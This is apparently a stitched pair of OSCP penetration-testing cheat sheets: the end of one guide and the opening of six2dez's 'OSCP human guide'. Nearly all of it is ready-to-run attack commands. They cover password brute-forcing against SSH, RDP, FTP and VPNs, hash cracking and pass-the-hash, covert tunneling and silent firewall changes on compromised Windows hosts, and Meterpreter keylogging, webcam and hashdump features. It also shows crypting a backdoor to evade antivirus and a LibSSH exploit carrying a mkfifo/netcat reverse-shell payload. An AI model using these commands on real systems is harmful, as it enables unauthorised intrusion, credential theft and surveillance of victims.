1700 | - John the ripper can mutate password lists
1701 | nano /etc/john/john.conf
1702 | `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
1703 |
1704 | - Medusa
1705 |
1706 | - Medusa, initiated against an htaccess protected web
1707 | directory
1708 | `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
1709 |
1710 | - Ncrack
1711 |
1712 | - ncrack (from the makers of nmap) can brute force RDP
1713 | `ncrack -vv --user offsec -P password-file.txt rdp://$ip`
1714 |
1715 | - Hydra
1716 |
1717 | - Hydra brute force against SNMP
1718 | `hydra -P password-file.txt -v $ip snmp`
1719 |
1720 | - Hydra FTP known user and password list
1721 | `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`
1722 |
1723 | - Hydra SSH using list of users and passwords
1724 | `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
1725 |
1726 | - Hydra SSH using a known password and a username list
1727 | `hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh`
1728 |
1729 | - Hydra SSH Against Known username on port 22
1730 | `hydra $ip -s 22 ssh -l -P big\_wordlist.txt`
1731 |
1732 | - Hydra POP3 Brute Force
1733 | `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`
1734 |
1735 | - Hydra SMTP Brute Force
1736 | `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`
1737 |
1738 | - Hydra attack http get 401 login with a dictionary
1739 | `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
1740 |
1741 | - Hydra attack Windows Remote Desktop with rockyou
1742 | `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
1743 |
1744 |
1745 | - Password Hash Attacks
1746 | -------------------------------------------------------------------------------------------------------------------
1747 |
1748 | - Online Password Cracking
1749 | [*https://crackstation.net/*](https://crackstation.net/)
1750 |
1751 | - Hashcat running on
1752 |
1753 | - Sample Hashes
1754 | [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
1755 |
1756 | - Identify Hashes
1757 | hash-identifier
1758 |
1759 | - Crask linux hashes you must first unshadow them:
1760 | unshadow passwd-file.txt shadow-file.txt
1761 | unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
1762 |
1763 | - John the Ripper - Password Hash Cracking
1764 |
1765 | - john $ip.pwdump
1766 |
1767 | - john --wordlist=/usr/share/wordlists/rockyou.txt hashes
1768 |
1769 | - john --rules --wordlist=/usr/share/wordlists/rockyou.txt
1770 |
1771 | - john --rules --wordlist=/usr/share/wordlists/rockyou.txt
1772 | unshadowed.txt
1773 |
1774 | - JTR forced descrypt cracking with wordlist
1775 | john --format=descrypt --wordlist
1776 | /usr/share/wordlists/rockyou.txt hash.txt
1777 |
1778 | - JTR forced descrypt brute force cracking
1779 | john --format=descrypt hash --show
1780 |
1781 | - Passing the Hash in Windows
1782 |
1783 | - Use Metasploit to exploit one of the SMB servers in the labs.
1784 | Dump the password hashes and attempt a pass-the-hash attack
1785 | against another system:
1786 |
1787 | export
1788 | SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
1789 |
1790 | pth-winexe -U administrator //$ip cmd
1791 |
1792 | Networking, Pivoting and Tunneling
1793 | ================================================================================================================================
1794 |
1795 | - Port Forwarding - accept traffic on a given IP address and port and
1796 | redirect it to a different IP address and port
1797 |
1798 | - apt-get install rinetd
1799 |
1800 | - cat /etc/rinetd.conf
1801 | \# bindadress bindport connectaddress connectport
1802 | w.x.y.z 53 a.b.c.d 80
1803 |
1804 | - SSH Local Port Forwarding: supports bi-directional communication
1805 | channels
1806 |
1807 | - ssh <gateway> -L <local port to listen>:<remote
1808 | host>:<remote port>
1809 |
1810 | - SSH Remote Port Forwarding: Suitable for popping a remote shell on
1811 | an internal non routable network
1812 |
1813 | - ssh <gateway> -R <remote port to bind>:<local
1814 | host>:<local port>
1815 |
1816 | - SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
1817 | attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
1818 | network on ANY PORT
1819 |
1820 | - ssh -D <local proxy port> -p <remote port>
1821 | <target>
1822 |
1823 | - Proxychains - Perform nmap scan within a DMZ from an external
1824 | computer
1825 |
1826 | - Create reverse SSH tunnel from Popped machine on :2222
1827 | ssh -f -N -R 2222:$ip:22 root@$ip
1828 |
1829 | - Create a Dynamic application-level port forward on 8080 thru
1830 | 2222
1831 | ssh -f -N -D $ip:8080 -p 2222 hax0r@$ip
1832 |
1833 | - Leverage the SSH SOCKS server to perform Nmap scan on network
1834 | using proxy chains
1835 | proxychains nmap --top-ports=20 -sT -Pn $ip/24
1836 |
1837 | - HTTP Tunneling
1838 | nc -vvn $ip 8888
1839 |
1840 | - Traffic Encapsulation - Bypassing deep packet inspection
1841 |
1842 | - http\_tunnel
1843 | On server side:
1844 | sudo hts -F <server\_ip\_addr>:<port\_of\_your\_app>
1845 | 80
1846 | On client side:
1847 | sudo htc -P <my\_proxy.com:proxy\_port> -F
1848 | <port\_of\_your\_app> <server\_ip\_addr>:80
1849 | stunnel
1850 |
1851 | - Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
1852 | network
1853 |
1854 | - Tunnel on port 22
1855 | plink -l root -pw pass -R 3389:$ip:3389 $ip
1856 |
1857 | - Port 22 blocked? Try port 80? or 443?
1858 | plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P
1859 | 80
1860 |
1861 | - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
1862 | (bypass deep packet inspection)
1863 |
1864 | - Windows machine add required firewall rules without prompting
1865 | the user
1866 |
1867 | - netsh advfirewall firewall add rule name="httptunnel\_client"
1868 | dir=in action=allow program="httptunnel\_client.exe" enable=yes
1869 |
1870 | - netsh advfirewall firewall add rule name="3000" dir=in
1871 | action=allow protocol=TCP localport=3000
1872 |
1873 | - netsh advfirewall firewall add rule name="1080" dir=in
1874 | action=allow protocol=TCP localport=1080
1875 |
1876 | - netsh advfirewall firewall add rule name="1079" dir=in
1877 | action=allow protocol=TCP localport=1079
1878 |
1879 | - Start the http tunnel client
1880 | httptunnel\_client.exe
1881 |
1882 | - Create HTTP reverse shell by connecting to localhost port 3000
1883 | plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P
1884 | 3000
1885 |
1886 | - VLAN Hopping
1887 |
1888 | - git clone https://github.com/nccgroup/vlan-hopping.git
1889 | chmod 700 frogger.sh
1890 | ./frogger.sh
1891 |
1892 | - VPN Hacking
1893 |
1894 | - Identify VPN servers:
1895 | ./udp-protocol-scanner.pl -p ike $ip
1896 |
1897 | - Scan a range for VPN servers:
1898 | ./udp-protocol-scanner.pl -p ike -f ip.txt
1899 |
1900 | - Use IKEForce to enumerate or dictionary attack VPN servers:
1901 | pip install pyip
1902 | git clone
1903 | Perform IKE VPN enumeration with IKEForce:
1904 | ./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
1905 | Bruteforce IKE VPN using IKEForce:
1906 | ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w
1907 | passwords.txt -s 1
1908 | Use ike-scan to capture the PSK hash:
1909 | ike-scan
1910 | ike-scan TARGET-IP
1911 | ike-scan -A TARGET-IP
1912 | ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
1913 | ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP
1914 | Use psk-crack to crack the PSK hash
1915 | psk-crack hash-file.txt
1916 | pskcrack
1917 | psk-crack -b 5 TARGET-IPkey
1918 | psk-crack -b 5
1919 | --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
1920 | 192-168-207-134key
1921 | psk-crack -d /path/to/dictionary-file TARGET-IP-key
1922 |
1923 | - PPTP Hacking
1924 |
1925 | - Identifying PPTP, it listens on TCP: 1723
1926 | NMAP PPTP Fingerprint:
1927 | nmap –Pn -sV -p 1723 TARGET(S)
1928 | PPTP Dictionary Attack
1929 | thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
1930 |
1931 | - Port Forwarding/Redirection
1932 |
1933 | - PuTTY Link tunnel - SSH Tunneling
1934 |
1935 | - Forward remote port to local address:
1936 | plink.exe -P 22 -l root -pw "1337" -R 445:$ip:445 $ip
1937 |
1938 | - SSH Pivoting
1939 |
1940 | - SSH pivoting from one network to another:
1941 | ssh -D $ip:1010 -p 22 user@$ip
1942 |
1943 | - DNS Tunneling
1944 |
1945 | - dnscat2 supports “download” and “upload” commands for getting
1946 | files (data and programs) to and from the target machine.
1947 |
1948 | - Attacking Machine Installation:
1949 | apt-get update
1950 | apt-get -y install ruby-dev git make g++
1951 | gem install bundler
1952 | git clone https://github.com/iagox86/dnscat2.git
1953 | cd dnscat2/server
1954 | bundle install
1955 |
1956 | - Run dnscat2:
1957 | ruby ./dnscat2.rb
1958 | dnscat2> New session established: 1422
1959 | dnscat2> session -i 1422
1960 |
1961 | - Target Machine:
1962 | https://downloads.skullsecurity.org/dnscat2/
1963 | https://github.com/lukebaggett/dnscat2-powershell/
1964 | dnscat --host <dnscat server\_ip>
1965 |
1966 | The Metasploit Framework
1967 | ======================================================================================================================
1968 |
1969 | - See [*Metasploit Unleashed
1970 | Course*](https://www.offensive-security.com/metasploit-unleashed/)
1971 | in the Essentials
1972 |
1973 | - Search for exploits using Metasploit GitHub framework source code:
1974 | [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
1975 | Translate them for use on OSCP LAB or EXAM.
1976 |
1977 | - Metasploit
1978 |
1979 | - MetaSploit requires Postfresql
1980 | systemctl start postgresql
1981 |
1982 | - To enable Postgresql on startup
1983 | systemctl enable postgresql
1984 |
1985 | - MSF Syntax
1986 |
1987 | - Start metasploit
1988 | msfconsole
1989 | msfconsole -q
1990 |
1991 | - Show help for command
1992 | show -h
1993 |
1994 | - Show Auxiliary modules
1995 | show auxiliary
1996 |
1997 | - Use a module
1998 | use auxiliary/scanner/snmp/snmp\_enum
1999 | use auxiliary/scanner/http/webdav\_scanner
2000 | use auxiliary/scanner/smb/smb\_version
2001 | use auxiliary/scanner/ftp/ftp\_login
2002 | use exploit/windows/pop3/seattlelab\_pass
2003 |
2004 | - Show the basic information for a module
2005 | info
2006 |
2007 | - Show the configuration parameters for a module
2008 | show options
2009 |
2010 | - Set options for a module
2011 | set RHOSTS $ip-254
2012 | set THREADS 10
2013 |
2014 | - Run the module
2015 | run
2016 |
2017 | - Execute an Exploit
2018 | exploit
2019 |
2020 | - Search for a module
2021 | search type:auxiliary login
2022 |
2023 | - Metasploit Database Access
2024 |
2025 | - Show all hosts discovered in the MSF database
2026 | hosts
2027 |
2028 | - Scan for hosts and store them in the MSF database
2029 | db\_nmap
2030 |
2031 | - Search machines for specific ports in MSF database
2032 | services -p 443
2033 |
2034 | - Leverage MSF database to scan SMB ports (auto-completed
2035 | rhosts)
2036 | services -p 443 --rhosts
2037 |
2038 | - Staged and Non-staged
2039 |
2040 | - Non-staged payload - is a payload that is sent in its entirety
2041 | in one go
2042 |
2043 | - Staged - sent in two parts
2044 | Not have enough buffer space
2045 | Or need to bypass antivirus
2046 |
2047 | - Experimenting with Meterpreter
2048 |
2049 | - Get system information from Meterpreter Shell
2050 | sysinfo
2051 |
2052 | - Get user id from Meterpreter Shell
2053 | getuid
2054 |
2055 | - Search for a file
2056 | search -f \*pass\*.txt
2057 |
2058 | - Upload a file
2059 | upload /usr/share/windows-binaries/nc.exe c:\\\\Users\\\\Offsec
2060 |
2061 | - Download a file
2062 | download c:\\\\Windows\\\\system32\\\\calc.exe /tmp/calc.exe
2063 |
2064 | - Invoke a command shell from Meterpreter Shell
2065 | shell
2066 |
2067 | - Exit the meterpreter shell
2068 | exit
2069 |
2070 | - Metasploit Exploit Multi Handler
2071 |
2072 | - multi/handler to accept an incoming reverse\_https\_meterpreter
2073 | payload
2074 | use exploit/multi/handler
2075 | set PAYLOAD windows/meterpreter/reverse\_https
2076 | set LHOST $ip
2077 | set LPORT 443
2078 | exploit
2079 | \[\*\] Started HTTPS reverse handler on https://$ip:443/
2080 |
2081 | - Building Your Own MSF Module
2082 |
2083 | - mkdir -p ~/.msf4/modules/exploits/linux/misc
2084 | cd ~/.msf4/modules/exploits/linux/misc
2085 | cp
2086 | /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
2087 | ./crossfire.rb
2088 | nano crossfire.rb
2089 |
2090 | - Post Exploitation with Metasploit
2091 |
2092 | - download Download a file or directory
2093 | upload Upload a file or directory
2094 | portfwd Forward a local port to a remote service
2095 | route View and modify the routing table
2096 | keyscan\_start Start capturing keystrokes
2097 | keyscan\_stop Stop capturing keystrokes
2098 | screenshot Grab a screenshot of the interactive desktop
2099 | record\_mic Record audio from the default microphone for X
2100 | seconds
2101 | webcam\_snap Take a snapshot from the specified webcam
2102 | getsystem Attempt to elevate your privilege to that of local
2103 | system.
2104 | hashdump Dumps the contents of the SAM database
2105 |
2106 | - Meterpreter Post Exploitation Features
2107 |
2108 | - Create a Meterpreter background session
2109 | background
2110 |
2111 | Bypassing Antivirus Software
2112 | ===========================================================================================================================
2113 |
2114 | - Crypting Known Malware with Software Protectors
2115 |
2116 | - One such open source crypter, called Hyperion
2117 | cp /usr/share/windows-binaries/Hyperion-1.0.zip
2118 | unzip Hyperion-1.0.zip
2119 | cd Hyperion-1.0/
2120 | i686-w64-mingw32-g++ Src/Crypter/\*.cpp -o hyperion.exe
2121 | cp -p
2122 | /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc\_s\_sjlj-1.dll
2123 | .
2124 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll
2125 | .
2126 | wine hyperion.exe ../backdoor.exe ../crypted.exe
2127 |
--------------------------------------------------------------------------------
/oscp_human_guide.md:
--------------------------------------------------------------------------------
1 | By https://github.com/six2dez
2 |
3 |
4 |
5 | Table of Contents
6 | =================
7 |
8 | * [Table of Contents](#table-of-contents)
9 | * [Recon](#recon)
10 | * [Enumeration AIO](#enumeration-aio)
11 | * [File enumeration](#file-enumeration)
12 | * [Common](#common)
13 | * [Disk files](#disk-files)
14 | * [Images](#images)
15 | * [Audio](#audio)
16 | * [Port 21 - FTP](#port-21---ftp)
17 | * [Port 22 - SSH](#port-22---ssh)
18 | * [Port 25 - Telnet](#port-25---telnet)
19 | * [Port 69 - UDP - TFTP](#port-69---udp---tftp)
20 | * [Kerberos - 88](#kerberos---88)
21 | * [Port 110 - Pop3](#port-110---pop3)
22 | * [Port 111 - Rpcbind](#port-111---rpcbind)
23 | * [Port 135 - MSRPC](#port-135---msrpc)
24 | * [Port 139/445 - SMB](#port-139445---smb)
25 | * [Port 161/162 UDP - SNMP](#port-161162-udp---snmp)
26 | * [LDAP - 389,636](#ldap---389636)
27 | * [HTTPS - 443](#https---443)
28 | * [500 - ISAKMP IKE](#500---isakmp-ike)
29 | * [513 - Rlogin](#513---rlogin)
30 | * [541 - FortiNet SSLVPN](#541---fortinet-sslvpn)
31 | * [Port 554 - RTSP](#port-554---rtsp)
32 | * [Port 1030/1032/1033/1038](#port-1030103210331038)
33 | * [MSSQL - 1433](#mssql---1433)
34 | * [Port 1521 - Oracle](#port-1521---oracle)
35 | * [Port 2049 - NFS](#port-2049---nfs)
36 | * [Port 2100 - Oracle XML DB](#port-2100---oracle-xml-db)
37 | * [3306 - MySQL](#3306---mysql)
38 | * [Port 3339 - Oracle web interface](#port-3339---oracle-web-interface)
39 | * [RDP - 3389](#rdp---3389)
40 | * [WinRM - 5985](#winrm---5985)
41 | * [VNC - 5900](#vnc---5900)
42 | * [Redis - 6379](#redis---6379)
43 | * [MsDeploy - 8172](#msdeploy---8172)
44 | * [Webdav](#webdav)
45 | * [Unknown ports](#unknown-ports)
46 | * [Port 80 - Web server](#port-80---web-server)
47 | * [Url brute force](#url-brute-force)
48 | * [Default/Weak login](#defaultweak-login)
49 | * [LFI/RFI](#lfirfi)
50 | * [SQL-Injection](#sql-injection)
51 | * [XSS](#xss)
52 | * [Sql-login-bypass](#sql-login-bypass)
53 | * [Bypass image upload restrictions](#bypass-image-upload-restrictions)
54 | * [Password brute force - last resort](#password-brute-force---last-resort)
55 | * [Vulnerability analysis](#vulnerability-analysis)
56 | * [BOF](#bof)
57 | * [Find xploits - Searchsploit and google](#find-xploits---searchsploit-and-google)
58 | * [Reverse Shells](#reverse-shells)
59 | * [Privilege escalation](#privilege-escalation)
60 | * [Common](#common-1)
61 | * [Set up Webserver](#set-up-webserver)
62 | * [Set up FTP Server](#set-up-ftp-server)
63 | * [Set up TFTP](#set-up-tftp)
64 | * [Linux](#linux)
65 | * [Useful commands](#useful-commands)
66 | * [Basic info](#basic-info)
67 | * [Kernel exploits](#kernel-exploits)
68 | * [Programs running as root](#programs-running-as-root)
69 | * [Installed software](#installed-software)
70 | * [Weak/reused/plaintext passwords](#weakreusedplaintext-passwords)
71 | * [Inside service](#inside-service)
72 | * [Suid misconfiguration](#suid-misconfiguration)
73 | * [Unmounted filesystems](#unmounted-filesystems)
74 | * [Cronjob](#cronjob)
75 | * [SSH Keys](#ssh-keys)
76 | * [Bad path configuration](#bad-path-configuration)
77 | * [Find plain passwords](#find-plain-passwords)
78 | * [Scripts](#scripts)
79 | * [SUID](#suid)
80 | * [PS Monitor for cron](#ps-monitor-for-cron)
81 | * [Linux Privesc Tools](#linux-privesc-tools)
82 | * [Linux Precompiled Exploits](#linux-precompiled-exploits)
83 | * [Windows](#windows)
84 | * [Basic info](#basic-info-1)
85 | * [Kernel exploits](#kernel-exploits-1)
86 | * [Cleartext passwords](#cleartext-passwords)
87 | * [Reconfigure service parameters](#reconfigure-service-parameters)
88 | * [Dump process for passwords](#dump-process-for-passwords)
89 | * [Inside service](#inside-service-1)
90 | * [Programs running as root/system](#programs-running-as-rootsystem)
91 | * [Installed software](#installed-software-1)
92 | * [Scheduled tasks](#scheduled-tasks)
93 | * [Weak passwords](#weak-passwords)
94 | * [Add user and enable RDP](#add-user-and-enable-rdp)
95 | * [Powershell sudo for Windows](#powershell-sudo-for-windows)
96 | * [Windows download with bitsadmin](#windows-download-with-bitsadmin)
97 | * [Windows download with certutil.exe](#windows-download-with-certutilexe)
98 | * [Windows download with powershell](#windows-download-with-powershell)
99 | * [Windows Download from FTP](#windows-download-from-ftp)
100 | * [Windows create SMB Server transfer files](#windows-create-smb-server-transfer-files)
101 | * [Windows download with VBS](#windows-download-with-vbs)
102 | * [Windowss XP SP1 PrivEsc](#windowss-xp-sp1-privesc)
103 | * [Pass The Hash](#pass-the-hash)
104 | * [Scripts](#scripts-1)
105 | * [Useradd](#useradd)
106 | * [Powershell Run As](#powershell-run-as)
107 | * [Powershell Reverse Shell](#powershell-reverse-shell)
108 | * [Windows privesc/enum tools](#windows-privescenum-tools)
109 | * [Windows precompiled exploits](#windows-precompiled-exploits)
110 | * [Windows Port Forwarding](#windows-port-forwarding)
111 | * [Loot](#loot)
112 | * [Linux](#linux-1)
113 | * [Proof](#proof)
114 | * [Network secret](#network-secret)
115 | * [Passwords and hashes](#passwords-and-hashes)
116 | * [Dualhomed](#dualhomed)
117 | * [Tcpdump](#tcpdump)
118 | * [Interesting files](#interesting-files)
119 | * [Databases](#databases)
120 | * [SSH-Keys](#ssh-keys-1)
121 | * [Browser](#browser)
122 | * [Mail](#mail)
123 | * [GUI](#gui)
124 | * [Windows](#windows-1)
125 | * [Proof](#proof-1)
126 | * [Passwords and hashes](#passwords-and-hashes-1)
127 | * [Dualhomed](#dualhomed-1)
128 | * [Tcpdump](#tcpdump-1)
129 | * [Interesting files](#interesting-files-1)
130 |
131 | # **Recon**
132 |
133 | ```
134 | # Enumerate subnet
135 | nmap -sn 10.11.1.1/24
136 |
137 | # Fast simple scan
138 | nmap -sS 10.11.1.111
139 |
140 | # Full complete slow scan with output
141 | nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full 10.11.1.111
142 |
143 | # Autorecon
144 | python3 autorecon.py 10.11.1.111
145 |
146 | # OneTwoPunch
147 | https://raw.githubusercontent.com/superkojiman/onetwopunch/master/onetwopunch.sh
148 | onetwopunch.sh ip.txt tcp
149 |
150 | # Scan for UDP
151 | nmap 10.11.1.111 -sU
152 | unicornscan -mU -v -I 10.11.1.111
153 |
154 | # Connect to udp if one is open
155 | nc -u 10.11.1.111 48772
156 |
157 | # Responder
158 | responder -I eth0 -A
159 |
160 | # Amass
161 | amass enum -ip 10.11.1.1/24
162 |
163 | ```
164 | - sparta
165 | - `python /root/Reconnoitre/Reconnoitre/reconnoitre.py -t 10.11.1.111 -o test --services`
166 |
167 |
168 | ## Enumeration AIO
169 | [Penetration Testing Methodology - 0DAYsecurity.com](http://0daysecurity.com/penetration-testing/enumeration.html)
170 |
171 | ## File enumeration
172 |
173 | ### Common
174 |
175 | ```bash
176 | # Check real file type
177 | file file.xxx
178 |
179 | # Analyze strings
180 | strings file.xxx
181 | strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars
182 |
183 | # Check embedded files
184 | binwalk file.xxx # Check
185 | binwalk -e file.xxx # Extract
186 |
187 | # Check as binary file in hex
188 | ghex file.xxx
189 |
190 | # Check metadata
191 | exiftool file.xxx
192 |
193 | # Stego tool for multiple formats
194 | wget https://embeddedsw.net/zip/OpenPuff_release.zip
195 | unzip OpenPuff_release.zip -d ./OpenPuff
196 | wine OpenPuff/OpenPuff_release/OpenPuff.exe
197 | ```
198 |
199 | ### Disk files
200 |
201 | ```bash
202 | # guestmount can mount any kind of disk file
203 | sudo apt-get install libguestfs-tools
204 | guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory
205 | ```
206 |
207 | ### Images
208 |
209 | ```bash
210 | # Stego
211 | wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
212 | chmod +x stegsolve.jar
213 | java -jar stegsolve.jar
214 |
215 | # Stegpy
216 | stegpy -p file.png
217 |
218 | # Check png corrupted
219 | pngcheck -v image.jpeg
220 |
221 | # Check what kind of image is
222 | identify -verbose image.jpeg
223 | ```
224 |
225 | ### Audio
226 |
227 | ```bash
228 | # Check spectrogram
229 | wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb
230 | dpkg -i sonic-visualiser_4.0_amd64.deb
231 |
232 | # Check for Stego
233 | hideme stego.mp3 -f && cat output.txt #AudioStego
234 | ```
235 |
236 |
237 |
238 | ## Port 21 - FTP
239 |
240 | ```bash
241 | nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.111
242 | ```
243 |
244 | ## Port 22 - SSH
245 |
246 | - If you have usernames test login with username:username
247 | - Vulnerable Versions: 7.2p1
248 |
249 | ```
250 | Vulnerable Versions: 7.2p1
251 | nc 10.11.1.111 22
252 |
253 | User can ask to execute a command right after authentication before it’s default command or shell is executed
254 |
255 | $ ssh -v user@10.10.1.111 id
256 | ...
257 | Password:
258 | debug1: Authentication succeeded (keyboard-interactive).
259 | Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
260 | debug1: channel 0: new [client-session]
261 | debug1: Requesting no-more-sessions@openssh.com
262 | debug1: Entering interactive session.
263 | debug1: pledge: network
264 | debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
265 | debug1: Sending command: id
266 | debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
267 | debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
268 | uid=1000(user) gid=100(users) groups=100(users)
269 | debug1: channel 0: free: client-session, nchannels 1
270 | Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
271 | Bytes per second: sent 43133.4, received 44349.5
272 | debug1: Exit status 0
273 |
274 | Check Auth Methods:
275 |
276 | $ ssh -v 10.10.1.111
277 | OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
278 | ...
279 | debug1: Authentications that can continue: publickey,password,keyboard-interactive
280 |
281 | Force Auth Method:
282 |
283 | $ ssh -v 10.10.1.111 -o PreferredAuthentications=password
284 | ...
285 | debug1: Next authentication method: password
286 |
287 | BruteForce:
288 |
289 | patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
290 | hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
291 | medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
292 | ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111
293 |
294 | LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
295 | Id
296 | python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id
297 | Reverse
298 | python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"
299 |
300 | SSH FUZZ
301 | https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt
302 |
303 | cpan Net::SSH2
304 | ./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user
305 |
306 | use auxiliary/fuzzers/ssh/ssh_version_2
307 |
308 | SSH-AUDIT
309 | https://github.com/arthepsy/ssh-audit
310 |
311 | • https://www.exploit-db.com/exploits/18557 ~ Sysax 5.53 – SSH ‘Username’ Remote Buffer Overflow
312 | • https://www.exploit-db.com/exploits/45001 ~ OpenSSH < 6.6 SFTP – Command Execution
313 | • https://www.exploit-db.com/exploits/45233 ~ OpenSSH 2.3 < 7.7 – Username Enumeration
314 | • https://www.exploit-db.com/exploits/46516 ~ OpenSSH SCP Client – Write Arbitrary Files
315 |
316 | http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html
317 |
318 |
319 | SSH Enum users < 7.7:
320 | https://github.com/six2dez/ssh_enum_script
321 | https://www.exploit-db.com/exploits/45233
322 | python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"
323 |
324 | ```
325 |
326 | ## Port 25 - Telnet
327 |
328 | ```
329 | nc -nvv 10.11.1.111 25
330 | HELO foo
331 |
332 | telnet 10.11.1.111 25
333 | VRFY root
334 |
335 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111
336 | smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111
337 |
338 | Send email unauth:
339 |
340 | MAIL FROM:admin@admin.com
341 | RCPT TO:DestinationEmail@DestinationDomain.com
342 | DATA
343 | test
344 |
345 | .
346 |
347 | Receive:
348 | 250 OK
349 | ```
350 |
351 | ## Port 69 - UDP - TFTP
352 |
353 | This is used for tftp-server.
354 |
355 | - Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more.
356 | - Checks of FTP Port 21.
357 |
358 | ```
359 | nmap -p69 --script=tftp-enum.nse 10.11.1.111
360 | ```
361 |
362 | ## Kerberos - 88
363 |
364 | ```
365 | - MS14-068
366 | - GetUserSPNs
367 | GET USERS:
368 |
369 | nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
370 | use auxiliary/gather/kerberos_enumusers
371 |
372 | https://www.tarlogic.com/blog/como-funciona-kerberos/
373 | https://www.tarlogic.com/blog/como-atacar-kerberos/
374 |
375 | python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
376 |
377 | https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
378 | ```
379 |
380 | ## Port 110 - Pop3
381 |
382 | ```
383 | telnet 10.11.1.111
384 | USER pelle@10.11.1.111
385 | PASS admin
386 |
387 | or:
388 |
389 | USER pelle
390 | PASS admin
391 |
392 | # List all emails
393 | list
394 |
395 | # Retrieve email number 5, for example
396 | retr 9
397 | ```
398 |
399 | ## Port 111 - Rpcbind
400 |
401 | ```
402 | rpcinfo -p 10.11.1.111
403 | rpcclient -U "" 10.11.1.111
404 | srvinfo
405 | enumdomusers
406 | getdompwinfo
407 | querydominfo
408 | netshareenum
409 | netshareenumall
410 | ```
411 |
412 |
413 | ## Port 135 - MSRPC
414 |
415 | Some versions are vulnerable.
416 |
417 | ```
418 | nmap 10.11.1.111 --script=msrpc-enum
419 | msf > use exploit/windows/dcerpc/ms03_026_dcom
420 | ```
421 |
422 | ## Port 139/445 - SMB
423 |
424 |
425 | ```
426 | nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
427 |
